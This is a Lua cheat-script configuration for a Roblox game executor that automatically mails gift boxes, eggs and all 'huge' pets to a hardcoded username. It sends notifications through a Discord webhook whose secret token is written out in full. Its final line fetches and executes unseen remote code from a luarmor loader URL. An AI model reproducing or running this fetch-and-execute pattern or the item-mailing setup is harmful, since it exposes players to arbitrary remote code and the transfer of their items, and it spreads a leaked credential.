getgenv().Config = {
    ["EquipEnchants"] = {},
    ["CraftSnowflakeGifts"] = false,
    ["Mailing"] = {
        ["Usernames"] = {"jasonandashps99"},
        ["Items"] = {
            ["Lootbox"] = {
                ["Snowflake Gift"] = 5,
                ["2024 Gargantuan Christmas Present"] = 1,
                ["2024 X-Large Christmas Present"] = 5,
                ["2024 Large Christmas Present"] = 25,
                ["2024 Medium Christmas Present"] = 50,
                ["2024 Small Christmas Present"] = 100,
            },
            ["Egg"] = {
                ["Huge Machine Egg 4"] = 1,
            },
        },
        ["MailAllHuges"] = true --// False will mail all new huges, True will send all huges in inventory
    },
    ["Notifications"] = {
        ["UserID"] = "508625690195787776",
        ["Webhook"] = "https://discord.com/api/webhooks/1320119578675908700/ma-wVkqvJXG31Dnc5wxBaeHFa5kC11DwrEJH6WU_DBBGRNgZPyUwy4wvqzwczlMnmNwk"
    }
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/b883bc159a5f609adb4871db6fc15ea8.lua"))()
